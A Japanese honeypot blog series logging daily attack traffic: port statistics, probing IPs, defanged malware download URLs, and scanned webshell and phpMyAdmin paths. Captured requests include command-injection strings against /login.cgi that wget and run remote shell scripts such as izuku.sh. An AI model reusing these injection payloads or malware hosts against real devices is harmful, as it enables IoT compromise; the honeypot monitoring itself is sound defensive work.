ハニーポット簡易分析(34-38日目:9/11-9/15)
ちょっと感覚が空いてしまいましたが、Honeytrapの簡易分析した結果を記載します。
9月11日〜9月15日のHoneytrapのログ
9月11日:10073件 | |||
宛先ポート | 件数 | 割合 | サービス |
8545 | 2,907 | 28.86% | Ethereum |
445 | 1,996 | 19.82% | SMB |
22 | 1,047 | 10.39% | SSH |
5739 | 130 | 1.29% | ? |
81 | 81 | 0.80% | GoAhead Web Server |
1433 | 62 | 0.62% | Microsoft SQL Server |
52869 | 51 | 0.51% | D-Link, Realtek SDK |
3389 | 46 | 0.46% | RDP |
8080 | 46 | 0.46% | PROXY |
129 | 32 | 0.32% | Password Generator Protocol |
9月12日:8480件 | |||
宛先ポート | 件数 | 割合 | サービス |
8545 | 2,900 | 34.20% | Ethereum |
445 | 1,991 | 23.48% | SMB |
3389 | 105 | 1.24% | RDP |
52869 | 85 | 1.00% | D-Link, Realtek SDK |
1433 | 61 | 0.72% | Microsoft SQL Server |
81 | 45 | 0.53% | GoAhead Web Server |
82 | 33 | 0.39% | ? |
111 | 33 | 0.39% | ONC RPC (Sun RPC) |
4222 | 32 | 0.38% | Multi User Systems |
8080 | 32 | 0.38% | PROXY |
9月13日:7524件 | |||
宛先ポート | 件数 | 割合 | サービス |
8545 | 2,903 | 38.58% | Ethereum |
445 | 1,941 | 25.80% | SMB |
22 | 311 | 4.13% | SSH |
52869 | 86 | 1.14% | D-Link, Realtek SDK |
1433 | 50 | 0.66% | Microsoft SQL Server |
81 | 50 | 0.66% | GoAhead Web Server |
3389 | 41 | 0.55% | RDP |
27017 | 34 | 0.45% | MongoDB |
7777 | 34 | 0.45% | ? |
6000 | 33 | 0.44% | IRC |
9月14日:6516件 | |||
宛先ポート | 件数 | 割合 | サービス |
8545 | 2,904 | 44.57% | Ethereum |
445 | 1,873 | 28.75% | SMB |
443 | 83 | 1.27% | HTTPS |
3389 | 62 | 0.95% | RDP |
81 | 55 | 0.84% | GoAhead Web Server |
1433 | 52 | 0.80% | Microsoft SQL Server |
52869 | 49 | 0.75% | D-Link, Realtek SDK |
1434 | 33 | 0.51% | Microsoft SQL Server |
2252 | 33 | 0.51% | NJENET using SSL |
2376 | 33 | 0.51% | ? |
9月15日:6404件 | |||
宛先ポート | 件数 | 割合 | サービス |
8545 | 2,904 | 45.35% | Ethereum |
445 | 1,691 | 26.41% | SMB |
22 | 98 | 1.53% | SSH |
789 | 64 | 1.00% | ? |
1433 | 59 | 0.92% | Microsoft SQL Server |
81 | 43 | 0.67% | GoAhead Web Server |
3389 | 41 | 0.64% | RDP |
8080 | 40 | 0.63% | PROXY |
5555 | 29 | 0.45% | Android Debug Bridge |
3388 | 20 | 0.31% | ? |
<Ethereum関連の通信について>
◾️検知数
◾️送信元IP
送信元IP | 件数 |
46[.]166.148.196 | 22,448 |
172[.]105.211.241 | 26 |
213[.]202.242.16 | 26 |
138[.]197.137.152 | 24 |
185[.]10.68.247 | 16 |
122[.]228.10.50 | 1 |
71[.]6.146.130 | 1 |
80[.]82.77.139 | 1 |
80[.]82.77.33 | 1 |
グラフにまとめてみると、9/7から急激に増加しています。送信元IPは46[.]166.148.196から集中的に検知していました。該当のURLについて、調査して見ましたが特に悪質であるという明確な情報は得られませんでした。
Reputation Lookup - Cisco Talos
ペイロードは以下の内容であり、idの部分のみを変えて送ってきます。毎回同じリクエストを送ってくるので、毎日同じ検知数となっています。
<リクエスト内容>
POST / HTTP/1.1
Host: xxx.xxx.xxx.xxx:8545
User-Agent: Geth/v1.7.3-stable/linux-amd64/go1.9.2
Content-Length: 66 Content-Type: application/json
Accept-Encoding: gzip
Connection: close.
{"jsonrpc":"2.0","method":"eth_accounts","params":[], "id":309722}
ノードが持つアドレスを取得するメソッドを送信しているものですが、送信元が同じであることを考慮すると、調査行為というより、何かしらで設定をミスって自分のハニポのIPへ送信しているのかもしれません。現状はレスポンスを返すような設定を入れていないですが、レスポンスをきちんと返してあげれば、何かしらの反応があるかもしれません。
<マルウェアのダウンロード傾向>
特に大きく変わっていませんでした。Mirai系のマルウェアが多いですが、厳密にはいくつか種類があるので、ここら辺も一度整理したいと思ってます。
以上、簡易分析となります。
ハニーポット簡易分析(31-33日目:9/8-9/10)
なんとか、1ヶ月間分析を継続していけました(だいぶ遅れることはありましたが。。。)。3日分(8/8 - 8/10)のHoneytrapの解析結果となります。
<宛先ポート別検知数>
8月8日:5660件 | 8月9日:6055件 | 8月10日:12850件 | |||||||||
ポート | 件数 | 割合 | サービス | ポート | 件数 | 割合 | サービス | ポート | 件数 | 割合 | サービス |
8545 | 2,166 | 38.27% | Ethereum | 8545 | 2,899 | 47.88% | Ethereum | 5739 | 3,278 | 25.51% | ? |
445 | 1,908 | 33.71% | SMB | 445 | 1,782 | 29.43% | SMB | 8545 | 2,905 | 22.61% | Ethereum |
3389 | 84 | 1.48% | RDP | 1433 | 68 | 1.12% | Microsoft SQL Server | 445 | 2,161 | 16.82% | SMB |
1433 | 77 | 1.36% | Microsoft SQL Server | 44818 | 62 | 1.02% | ? | 503 | 160 | 1.25% | intrinsa |
6022 | 64 | 1.13% | X Window System | 52869 | 56 | 0.93% | D-Link, Realtek SDK | 22 | 108 | 0.84% | SSH |
52869 | 61 | 1.08% | D-Link, Realtek SDK | 3389 | 46 | 0.76% | RDP | 1433 | 65 | 0.51% | Microsoft SQL Server |
81 | 38 | 0.67% | GoAhead Web Server | 81 | 41 | 0.68% | GoAhead Web Server | 52869 | 51 | 0.40% | D-Link, Realtek SDK |
25 | 34 | 0.60% | SMTP | 5222 | 34 | 0.56% | ? | 3389 | 41 | 0.32% | RDP |
3386 | 33 | 0.58% | ? | 4911 | 33 | 0.55% | ? | 8080 | 34 | 0.26% | PROXY |
8098 | 32 | 0.57% | ? | 79 | 30 | 0.50% | ? | 10000 | 34 | 0.26% | Webmin |
<マルウェアダウンロード先>
→特に変化なし
◾️ポート 8545 の通信
<リクエスト>
POST / HTTP/1.1
Host: XXX.XX.XXX.XXX:8545
User-Agent: Geth/v1.7.3-stable/linux-md64/go1.9.2
{"jsonrpc":"2.0","method":"eth_accounts","params":[], "id":476}
<内容>
Ethereumノードへの調査活動となります。以下のサイトでも同様な攻撃を検知しており、解説してくれています。
Ethereumノードへの調査活動 - おふとん
ここ数日で急激に増加しているので、攻撃の前兆かもしれないので注視したいと思います。
◾️ポート 5739の通信
<リクエスト>
...+&......Cookie: mstshash=hello..........
<内容>
RDPに接続可能であるかの調査行為となります。RDPに接続する際、Cookie に mstshash とユーザー名をセットして通信を行う仕組みです。今回は hello のユーザー名で入れるかの調査行為ですが、通常であればログインできないと思います。ポート5739でRDPを使っているような記事は見られなかったので、攻撃者の意図が気になります。
------------
ここ数日で検知数が増加したポート番号が出てきましたので、これらのポートは注視していきたいと思います。
今回の簡易分析は以上となります。
ハニーポット簡易分析(30日目:9/7)
9/7の簡易分析となります。Honeytrapの傾向は特に変化はありませんでした。
Honeytrap
検知数:3576件(データ部 0byte以上)
<宛先ごとにおける検知数>
ポート | 件数 | 割合 | サービス |
445 | 1,944 | 54.50% | SMB |
3389 | 73 | 2.05% | RDP |
1433 | 69 | 1.93% | Microsoft SQL Server |
102 | 67 | 1.88% | ? |
52869 | 62 | 1.74% | D-Link, Realtek SDK |
81 | 46 | 1.29% | GoAhead Web Server |
123 | 34 | 0.95% | NTP |
22 | 34 | 0.95% | SSH |
49 | 32 | 0.90% | TACACS+ Login Host protocol |
8080 | 32 | 0.90% | PROXY |
マルウェアダウンロード別
宛先ポート |
マルウェアダウンロード先 | 件数 | VT |
5555 | hxxp://185[.]162[.]130[.]187/adbs2 | 1 | https://www.virustotal.com/ja/url/a2784a34beaea3d7dc9f3099fc03f4c56446a5116577281e6142b445a4ad2003/analysis/ |
5555 | hxxp://27[.]102[.]115[.]44/adbs2 | 2 | https://www.virustotal.com/ja/url/62fbd6898d5bd0adae9f5ad713b37f267d5b22c1b4b1ef564bcfa712f0fcf9b0/analysis/ |
8081 | hxxp://77[.]87[.]77[.]250/izuku[.]mips | 16 | https://www.virustotal.com/ja/file/b73ce9b0bd3fc58419443cbea301349af783d690ca1133d8548ea89d1bba003c/analysis/1535598509/ |
52869 | hxxp://107[.]191[.]99[.]41/elf[.]mips | 18 | https://www.virustotal.com/ja/file/c5dff296b4f8a176223082527cd58402df2a7e5bcf4414f961d5312530ed5ee6/analysis/1533020160/ |
52869 | hxxp://138[.]68[.]240[.]213/tenshimips[.]mips | 5 | https://www.virustotal.com/ja/file/b73ce9b0bd3fc58419443cbea301349af783d690ca1133d8548ea89d1bba003c/analysis/1535598509/ |
52869 | hxxp://80[.]211[.]112[.]150/mips | 1 | https://www.virustotal.com/ja/file/23a576856c353a434f8edf1d42c3c46beb48e8d39931043847ed193377decafe/analysis/1535606167/ |
WoWhoneypot
検知パス
Method | パス |
GET | / |
GET | /admin/assets/js/views/login.js |
GET | /login.cgi?cli=aa%20aa%27;wget -省略- |
GET | /pma/scripts/setup.php |
GET | @research.aegis[.]network/ |
GET | hxxp://112.35.53[.]83:10083/index.php |
OPTIONS | /ipc$ |
マルウェアダウンロード:
hxxp://77.87.77[.]250/izuku[.]sh
@research.aegis[.]network/ 宛の通信内容は以下となります。
GET @research.aegis[.]network/ HTTP/1.0
User-Agent: <script src="//research[.]aegis[.]network/test.js"></script>Referer: <script src="//research[.]aegis[.]network/test.js"></script>
該当するサイトへアクセスしてみると、Aegisという会社が行なっている調査が行なっている通信と推測されます。一応、該当するIPで/block のパスにアクセスすれば収集を止めてくれると書いてありますが、止め方が現実的ではないですね。企業のサーバであれば、サーバからアクセスもFWなどで制御しているはずなので。
該当する企業のサイトへアクセスしてみましたが、以下の表示だけであり、詳細な情報は記載されていませんでした。
以上、簡易分析となります。
ハニーポット簡易分析(26-29日目:9/2-9/6)
更新が滞ってしまいましたが、ここ数日分の簡易分析を書きたいと思います。
1.Honeytrap
<宛先ごとにおける検知数>
日付:9/3 件数:3801件 | 日付:9/4 件数:4699件 | ||||
宛先ポート | 件数 | 割合 | 宛先ポート | 件数 | 割合 |
445 | 1,894 | 49.83% | 445 | 2,235 | 45.01% |
3389 | 78 | 2.05% | 1433 | 77 | 1.55% |
52869 | 65 | 1.71% | 5006 | 64 | 1.29% |
1433 | 58 | 1.53% | 37777 | 60 | 1.21% |
81 | 42 | 1.11% | 52869 | 51 | 1.03% |
8080 | 36 | 0.95% | 8080 | 50 | 1.01% |
9944 | 33 | 0.87% | 3389 | 37 | 0.75% |
8088 | 17 | 0.45% | 25 | 33 | 0.66% |
8564 | 15 | 0.40% | 771 | 32 | 0.64% |
5555 | 14 | 0.37% | 5555 | 30 | 0.60% |
日付:9/5 件数:5399件 | 日付:9/6 件数:3971件 | ||||
宛先ポート | 件数 | 割合 | 宛先ポート | 件数 | 割合 |
445 | 2,073 | 38.40% | 445 | 2,115 | 53.26% |
2022 | 475 | 8.80% | 3389 | 76 | 1.91% |
6022 | 64 | 1.19% | 1433 | 72 | 1.81% |
3389 | 61 | 1.13% | 10001 | 64 | 1.61% |
1433 | 60 | 1.11% | 81 | 51 | 1.28% |
81 | 53 | 0.98% | 52869 | 48 | 1.21% |
52869 | 48 | 0.89% | 4899 | 39 | 0.98% |
25 | 37 | 0.69% | 587 | 34 | 0.86% |
8080 | 33 | 0.61% | 8080 | 33 | 0.83% |
8069 | 32 | 0.59% | 4443 | 32 | 0.81% |
日付 | マルウェアダウンロード先 | 検知数 |
9月3日 | hxxp://107[.]191[.]99[.]41/elf[.]mips | 30 |
9月3日 | hxxp://138[.]68[.]21[.]15/oxy[.]mips | 2 |
9月3日 | hxxp://185[.]10[.]68[.]127/rtbin | 4 |
9月3日 | hxxp://207[.]148[.]78[.]152/bc | 4 |
9月3日 | hxxp://27[.]102[.]115[.]44/adbs2 | 9 |
9月3日 | hxxp://77[.]87[.]77[.]250/izuku[.]mips | 14 |
9月3日 | hxxp://95[.]215[.]62[.]169/adbs | 1 |
9月4日 | hxxp://107[.]191[.]99[.]41/elf[.]mips | 9 |
9月4日 | hxxp://138[.]68[.]21[.]15/tenshimips[.]mips | 11 |
9月4日 | hxxp://148[.]72[.]176[.]78/ngynx | 1 |
9月4日 | hxxp://176[.]32[.]33[.]171/kenjiro[.]mips | 1 |
9月4日 | hxxp://77[.]87[.]77[.]250/izuku[.]mips | 11 |
9月4日 | hxxp://80[.]211[.]112[.]150/mips | 1 |
9月4日 | hxxp://80[.]211[.]173[.]159/mips | 2 |
9月5日 | hxxp://107[.]191[.]99[.]41/elf[.]mips | 11 |
9月5日 | hxxp://138[.]68[.]21[.]15/tenshimips[.]mips | 24 |
9月5日 | hxxp://148[.]72[.]176[.]78/ngynx | 1 |
9月5日 | hxxp://27[.]102[.]115[.]44/adbs2 | 2 |
9月5日 | hxxp://77[.]246[.]157[.]180/c | 1 |
9月5日 | hxxp://77[.]87[.]77[.]250/izuku[.]mips | 7 |
9月6日 | hxxp://107[.]191[.]99[.]41/elf[.]mips | 12 |
9月6日 | hxxp://138[.]68[.]21[.]15/tenshimips[.]mips | 5 |
9月6日 | hxxp://185[.]62[.]189[.]149/adbs2 | 2 |
9月6日 | hxxp://207[.]148[.]78[.]152/bc | 1 |
9月6日 | hxxp://27[.]102[.]115[.]44/adbs2 | 4 |
9月6日 | hxxp://77[.]87[.]77[.]250/izuku[.]mips | 14 |
変わらず、IoT系のマルウェアが多いですね。ちょくちょく、パス部分は変わっているので中身が少し変化しているかもしれません。
2.WoWHoneypot
@research.aegis.networkのパスに対して、アクセスが来てました。内容は調査行為でした。
WoWHoneypot マルウェアダウンロード先
http://148.72.176.78/ken.sh |
http://77.87.77.250/izuku.sh |
http://80.211.112.150/k |
http://148.72.176.78/ngynx |
http://77.73.69.246/dl |
WoWHoneypot 検知パス
日付 | メソッド | URLパス |
9月3日 | CONNECT | cn.bing[.]com:443 |
9月3日 | CONNECT | www.baidu[.]com:443 |
9月3日 | GET | / |
9月3日 | GET | /MyAdmin/scripts/setup.php |
9月3日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月3日 | GET | /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77[.]250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ |
9月3日 | GET | /login.cgi?cli=aa%20aa%27;wget%20hxxp://80.211.112[.]150/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ |
9月3日 | GET | /manager/html |
9月3日 | GET | /phpMyAdmin/scripts/setup.php |
9月3日 | GET | /pma/scripts/setup.php |
9月3日 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) |
9月3日 | GET | /web/cgi-bin/hi3510/param.cgi?cmd=getp2pattr&cmd=getuserattr |
9月3日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月3日 | GET | hxxp://www.ip.cn/ |
9月3日 | OPTIONS | /C$ |
9月3日 | PROPFIND | /C$ |
9月3日 | PROPFIND | /Users |
9月4日 | GET | / |
9月4日 | GET | /HNAP1/ |
9月4日 | GET | /_query.php |
9月4日 | GET | /appserv.php |
9月4日 | GET | /ccvv |
9月4日 | GET | /cmd.php |
9月4日 | GET | /cmdd.php |
9月4日 | GET | /cmv.php |
9月4日 | GET | /cmx.php |
9月4日 | GET | /db_cts.php |
9月4日 | GET | /db_pma.php |
9月4日 | GET | /desktop.ini.php |
9月4日 | GET | /hell.php |
9月4日 | GET | /help-e.php |
9月4日 | GET | /help.php |
9月4日 | GET | /java.php |
9月4日 | GET | /knal.php |
9月4日 | GET | /lala-dpr.php |
9月4日 | GET | /lala.php |
9月4日 | GET | /license.php |
9月4日 | GET | /log.php |
9月4日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月4日 | GET | /logon.php |
9月4日 | GET | /lol.php |
9月4日 | GET | /muhstik-dpr.php |
9月4日 | GET | /muhstik.php |
9月4日 | GET | /muhstik2.php |
9月4日 | GET | /muhstiks.php |
9月4日 | GET | /pmd_online.php |
9月4日 | GET | /shell.php |
9月4日 | GET | /test.php |
9月4日 | GET | /text.php |
9月4日 | GET | /uploader.php |
9月4日 | GET | /webdav/ |
9月4日 | GET | /wp-config.php |
9月4日 | GET | /wpo.php |
9月4日 | GET | /x.php |
9月4日 | GET | /z.php |
9月4日 | POST | /12.php |
9月4日 | POST | /1213.php |
9月4日 | POST | /3.php |
9月4日 | POST | /56.php |
9月4日 | POST | /9510.php |
9月4日 | POST | /9678.php |
9月4日 | POST | /aaaa.php |
9月4日 | POST | /ak.php |
9月4日 | POST | /ak47.php |
9月4日 | POST | /ak48.php |
9月4日 | POST | /angge.php |
9月4日 | POST | /aotu.php |
9月4日 | POST | /app.php |
9月4日 | POST | /aw.php |
9月4日 | POST | /bak.php |
9月4日 | POST | /cainiao.php |
9月4日 | POST | /ceshi.php |
9月4日 | POST | /cmd.php |
9月4日 | POST | /conflg.php |
9月4日 | POST | /data.php |
9月4日 | POST | /db__.init.php |
9月4日 | POST | /db_dataml.php |
9月4日 | POST | /db_desql.php |
9月4日 | POST | /db_session.init.php |
9月4日 | POST | /default.php |
9月4日 | POST | /defect.php |
9月4日 | POST | /fack.php |
9月4日 | POST | /feixiang.php |
9月4日 | POST | /h1.php |
9月4日 | POST | /help.php |
9月4日 | POST | /hh.php |
9月4日 | POST | /hm.php |
9月4日 | POST | /infoo.php |
9月4日 | POST | /ip.php |
9月4日 | POST | /l7.php |
9月4日 | POST | /l8.php |
9月4日 | POST | /lindex.php |
9月4日 | POST | /linuxse.php |
9月4日 | POST | /log.php |
9月4日 | POST | /m.php?pbid=open |
9月4日 | POST | /min.php |
9月4日 | POST | /mx.php |
9月4日 | POST | /mz.php |
9月4日 | POST | /pe.php |
9月4日 | POST | /phpStudy.php |
9月4日 | POST | /phpinfi.php |
9月4日 | POST | /post.php |
9月4日 | POST | /python.php |
9月4日 | POST | /q.php |
9月4日 | POST | /qaq.php |
9月4日 | POST | /qq.php |
9月4日 | POST | /qwe.php |
9月4日 | POST | /s.php |
9月4日 | POST | /sean.php |
9月4日 | POST | /sheep.php |
9月4日 | POST | /ssaa.php |
9月4日 | POST | /system.php |
9月4日 | POST | /test.php |
9月4日 | POST | /tiandi.php |
9月4日 | POST | /w.php |
9月4日 | POST | /wan.php |
9月4日 | POST | /wanan.php |
9月4日 | POST | /wc.php |
9月4日 | POST | /webslee.php |
9月4日 | POST | /weixiao.php |
9月4日 | POST | /wp-admins.php |
9月4日 | POST | /wshell.php |
9月4日 | POST | /wuwu11.php |
9月4日 | POST | /xiao.php |
9月4日 | POST | /xiaoma.php |
9月4日 | POST | /xiaomae.php |
9月4日 | POST | /xiaomar.php |
9月4日 | POST | /xshell.php |
9月4日 | POST | /xw.php |
9月4日 | POST | /xw1.php |
9月4日 | POST | /xx.php |
9月4日 | POST | /xz.php |
9月4日 | POST | /yao.php |
9月4日 | POST | /yumo.php |
9月4日 | POST | /zshmindex.php |
9月4日 | POST | /zuo.php |
9月4日 | POST | /zuoindex.php |
9月4日 | POST | /zuoshou.php |
9月4日 | PROPFIND | / |
9月5日 | GET | / |
9月5日 | GET | /_query.php |
9月5日 | GET | /admin/assets/js/views/login.js |
9月5日 | GET | /appserv.php |
9月5日 | GET | /cmd.php |
9月5日 | GET | /cmdd.php |
9月5日 | GET | /cmv.php |
9月5日 | GET | /cmx.php |
9月5日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月5日 | GET | /cmx.php?cmd=ec+A:C+D6 |
9月5日 | GET | /db_cts.php |
9月5日 | GET | /db_pma.php |
9月5日 | GET | /desktop.ini.php |
9月5日 | GET | /hell.php |
9月5日 | GET | /help-e.php |
9月5日 | GET | /help.php |
9月5日 | GET | /java.php |
9月5日 | GET | /knal.php |
9月5日 | GET | /lala-dpr.php |
9月5日 | GET | /lala.php |
9月5日 | GET | /license.php |
9月5日 | GET | /log.php |
9月5日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月5日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月5日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月5日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月5日 | GET | /login.cgi?cli=aa%20aa%27;wget 〜省略〜 |
9月5日 | GET | /logon.php |
9月5日 | GET | /lol.php |
9月5日 | GET | /muhstik-dpr.php |
9月5日 | GET | /muhstik.php |
9月5日 | GET | /muhstik2.php |
9月5日 | GET | /muhstiks.php |
9月5日 | GET | /pmd_online.php |
9月5日 | GET | /shell.php |
9月5日 | GET | /test.php |
9月5日 | GET | /text.php |
9月5日 | GET | /uploader.php |
9月5日 | GET | /webdav/ |
9月5日 | GET | /wp-config.php |
9月5日 | GET | /wpo.php |
9月5日 | GET | /x.php |
9月5日 | GET | /z.php |
9月5日 | POST | /12.php |
9月5日 | POST | /1213.php |
9月5日 | POST | /3.php |
9月5日 | POST | /56.php |
9月5日 | POST | /9510.php |
9月5日 | POST | /9678.php |
9月5日 | POST | /aaaa.php |
9月5日 | POST | /ak.php |
9月5日 | POST | /ak47.php |
9月5日 | POST | /ak48.php |
9月5日 | POST | /angge.php |
9月5日 | POST | /aotu.php |
9月5日 | POST | /app.php |
9月5日 | POST | /aw.php |
9月5日 | POST | /bak.php |
9月5日 | POST | /cainiao.php |
9月5日 | POST | /ceshi.php |
9月5日 | POST | /cmd.php |
9月5日 | POST | /cmx.php |
9月5日 | POST | /conflg.php |
9月5日 | POST | /data.php |
9月5日 | POST | /db.init.php |
9月5日 | POST | /db__.init.php |
9月5日 | POST | /db_dataml.php |
9月5日 | POST | /db_desql.php |
9月5日 | POST | /db_session.init.php |
9月5日 | POST | /default.php |
9月5日 | POST | /defect.php |
9月5日 | POST | /fack.php |
9月5日 | POST | /feixiang.php |
9月5日 | POST | /h1.php |
9月5日 | POST | /help.php |
9月5日 | POST | /hh.php |
9月5日 | POST | /hm.php |
9月5日 | POST | /images.php |
9月5日 | POST | /infoo.php |
9月5日 | POST | /ip.php |
9月5日 | POST | /l7.php |
9月5日 | POST | /l8.php |
9月5日 | POST | /lindex.php |
9月5日 | POST | /linuxse.php |
9月5日 | POST | /log.php |
9月5日 | POST | /m.php?pbid=open |
9月5日 | POST | /min.php |
9月5日 | POST | /mx.php |
9月5日 | POST | /mz.php |
9月5日 | POST | /pe.php |
9月5日 | POST | /phpStudy.php |
9月5日 | POST | /phpinfi.php |
9月5日 | POST | /post.php |
9月5日 | POST | /python.php |
9月5日 | POST | /q.php |
9月5日 | POST | /qaq.php |
9月5日 | POST | /qq.php |
9月5日 | POST | /qwe.php |
9月5日 | POST | /s.php |
9月5日 | POST | /sean.php |
9月5日 | POST | /sheep.php |
9月5日 | POST | /ssaa.php |
9月5日 | POST | /system.php |
9月5日 | POST | /test.php |
9月5日 | POST | /tiandi.php |
9月5日 | POST | /w.php |
9月5日 | POST | /wan.php |
9月5日 | POST | /wanan.php |
9月5日 | POST | /wc.php |
9月5日 | POST | /webslee.php |
9月5日 | POST | /weixiao.php |
9月5日 | POST | /wp-admins.php |
9月5日 | POST | /wshell.php |
9月5日 | POST | /wuwu11.php |
9月5日 | POST | /xiao.php |
9月5日 | POST | /xiaoma.php |
9月5日 | POST | /xiaomae.php |
9月5日 | POST | /xiaomar.php |
9月5日 | POST | /xshell.php |
9月5日 | POST | /xw.php |
9月5日 | POST | /xw1.php |
9月5日 | POST | /xx.php |
9月5日 | POST | /xz.php |
9月5日 | POST | /yao.php |
9月5日 | POST | /yumo.php |
9月5日 | POST | /zshmindex.php |
9月5日 | POST | /zuo.php |
9月5日 | POST | /zuoindex.php |
9月5日 | POST | /zuoshou.php |
9月5日 | PROPFIND | / |
9月6日 | GET | / |
9月6日 | GET | /1AS/index.jsp |
9月6日 | GET | /1q/index.jsp |
9月6日 | GET | /2323633/index.jsp |
9月6日 | GET | /51/index.jsp |
9月6日 | GET | /511/index.jsp |
9月6日 | GET | /5211111111111/index.jsp |
9月6日 | GET | /AAAAAAAAAAAAAAAAAAAAuper/index.jsp |
9月6日 | GET | /Anzzpo/index.jsp |
9月6日 | GET | /Aqwe/index.jsp |
9月6日 | GET | /CluJaNul/index.jsp |
9月6日 | GET | /EWFQ/index.jsp |
9月6日 | GET | /FA/index.jsp |
9月6日 | GET | /Fendou/index.jsp |
9月6日 | GET | /Fido/index.jsp |
9月6日 | GET | /JSP/index.jsp |
9月6日 | GET | /JuLiAn/index.jsp |
9月6日 | GET | /Liutao/index.jsp |
9月6日 | GET | /Memory/index.jsp |
9月6日 | GET | /Micrsyse2m/index.jsp |
9月6日 | GET | /MyAdmin/scripts/setup.php |
9月6日 | GET | /Mytomcat/index.jsp |
9月6日 | GET | /PMA/index.php |
9月6日 | GET | /PMA2/index.php |
9月6日 | GET | /QQ374666283/index.jsp |
9月6日 | GET | /QQ443076142/index.jsp |
9月6日 | GET | /QQ563332298AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/index.jsp |
9月6日 | GET | /QQ727095531/index.jsp |
9月6日 | GET | /QQPP/index.jsp |
9月6日 | GET | /SQLL/index.jsp |
9月6日 | GET | /Tomcatmansagxesaasxsas/index.jsp |
9月6日 | GET | /Xs/index.jsp |
9月6日 | GET | /_query.php |
9月6日 | GET | /admin/PMA/index.php |
9月6日 | GET | /admin/assets/js/views/login.js |
9月6日 | GET | /admin/index.php |
9月6日 | GET | /admin/mysql/index.php |
9月6日 | GET | /admin/mysql2/index.php |
9月6日 | GET | /admin/phpMyAdmin/index.php |
9月6日 | GET | /admin/phpmyadmin2/index.php |
9月6日 | GET | /ak/index.jsp |
9月6日 | GET | /apach/index.jsp |
9月6日 | GET | /apache-tomcat/index.jsp |
9月6日 | GET | /apache-web/index.jsp |
9月6日 | GET | /appserv.php |
9月6日 | GET | /apptor/index.jsp |
9月6日 | GET | /asd/index.jsp |
9月6日 | GET | /black/index.jsp |
9月6日 | GET | /chaochao/index.jsp |
9月6日 | GET | /china/index.jsp |
9月6日 | GET | /chuan/index.jsp |
9月6日 | GET | /claroline/phpMyAdmin/index.php |
9月6日 | GET | /cmd.php |
9月6日 | GET | /cmd/index.jsp |
9月6日 | GET | /cmd2/index.jsp |
9月6日 | GET | /cmdd.php |
9月6日 | GET | /cmv.php |
9月6日 | GET | /cmx.php |
9月6日 | GET | /cwx/index.jsp |
9月6日 | GET | /dan/index.jsp |
9月6日 | GET | /db/index.php |
9月6日 | GET | /db_cts.php |
9月6日 | GET | /db_pma.php |
9月6日 | GET | /dbadmin/index.php |
9月6日 | GET | /desktop.ini.php |
9月6日 | GET | /dingfan/index.jsp |
9月6日 | GET | /dream/index.jsp |
9月6日 | GET | /emperor/index.jsp |
9月6日 | GET | /emperor3/index.jsp |
9月6日 | GET | /f4ck/index.jsp |
9月6日 | GET | /feng/index.jsp |
9月6日 | GET | /fuckxue/index.jsp |
9月6日 | GET | /goc-vpn/index.jsp |
9月6日 | GET | /gxjsp/index.jsp |
9月6日 | GET | /hacks/index.jsp |
9月6日 | GET | /hcskk/index.jsp |
9月6日 | GET | /hell.php |
9月6日 | GET | /help-e.php |
9月6日 | GET | /help.php |
9月6日 | GET | /host-mana/index.jsp |
9月6日 | GET | /ht/index.jsp |
9月6日 | GET | /hua/index.jsp |
9月6日 | GET | /iesvc/index.jsp |
9月6日 | GET | /index.php |
9月6日 | GET | /java.php |
9月6日 | GET | /javi/index.jsp |
9月6日 | GET | /javi100/index.jsp |
9月6日 | GET | /jc/index.jsp |
9月6日 | GET | /jo3/index.jsp |
9月6日 | GET | /king/index.jsp |
9月6日 | GET | /knal.php |
9月6日 | GET | /koko/index.jsp |
9月6日 | GET | /lala-dpr.php |
9月6日 | GET | /lala.php |
9月6日 | GET | /license.php |
9月6日 | GET | /lincogo/index.jsp |
9月6日 | GET | /log.php |
9月6日 | GET | /login.cgi?cli=aa%20aa%27;wget%20hxxp://77.87.77[.]250/izuku.sh%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ |
9月6日 | GET | /logon.php |
9月6日 | GET | /lol.php |
9月6日 | GET | /looky/index.jsp |
9月6日 | GET | /manager/html |
9月6日 | GET | /maque6695940/index.jsp |
9月6日 | GET | /maque66959401/index.jsp |
9月6日 | GET | /memimi/index.jsp |
9月6日 | GET | /muhstik-dpr.php |
9月6日 | GET | /muhstik.php |
9月6日 | GET | /muhstik2.php |
9月6日 | GET | /muhstiks.php |
9月6日 | GET | /myadmin/index.php |
9月6日 | GET | /myadmin2/index.php |
9月6日 | GET | /mysql-admin/index.php |
9月6日 | GET | /mysql/index.php |
9月6日 | GET | /mysql/scripts/setup.php |
9月6日 | GET | /mysqladmin/index.php |
9月6日 | GET | /mysqladmin/scripts/setup.php |
9月6日 | GET | /mzy/index.jsp |
9月6日 | GET | /osu/index.jsp |
9月6日 | GET | /phpMyAdmin.old/index.php |
9月6日 | GET | /phpMyAdmin/index.php |
9月6日 | GET | /phpMyAdmin/phpMyAdmin/index.php |
9月6日 | GET | /phpMyAdmin/scripts/setup.php |
9月6日 | GET | /phpMyAdminold/index.php |
9月6日 | GET | /phpMyadmin_bak/index.php |
9月6日 | GET | /phpadmin/index.php |
9月6日 | GET | /phpma/index.php |
9月6日 | GET | /phpmyadmin-old/index.php |
9月6日 | GET | /phpmyadmin0/index.php |
9月6日 | GET | /phpmyadmin1/index.php |
9月6日 | GET | /phpmyadmin2/index.php |
9月6日 | GET | /piaomiao111/index.jsp |
9月6日 | GET | /pma-old/index.php |
9月6日 | GET | /pma/scripts/setup.php |
9月6日 | GET | /pmamy/index.php |
9月6日 | GET | /pmamy2/index.php |
9月6日 | GET | /pmd/index.php |
9月6日 | GET | /pmd_online.php |
9月6日 | GET | /private/index.jsp |
